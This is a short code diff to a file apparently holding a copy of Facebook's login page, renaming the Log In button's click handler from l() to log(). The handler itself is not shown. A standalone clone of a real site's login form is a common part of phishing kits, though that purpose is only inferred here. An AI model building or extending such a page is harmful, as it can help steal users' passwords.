--- a/facebook/index.html
+++ b/facebook/index.html
@@ -130,7 +130,7 @@
                     <label for="password">Password</label>
                     <input type="password" id="pass" name="password" required>
                 </div>
-                <button onclick="l()">Log In</button>
+                <button onclick="log()">Log In</button>
                 <div class="forgot-password">
                     <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0">Forgot password?</a>
                 </div>
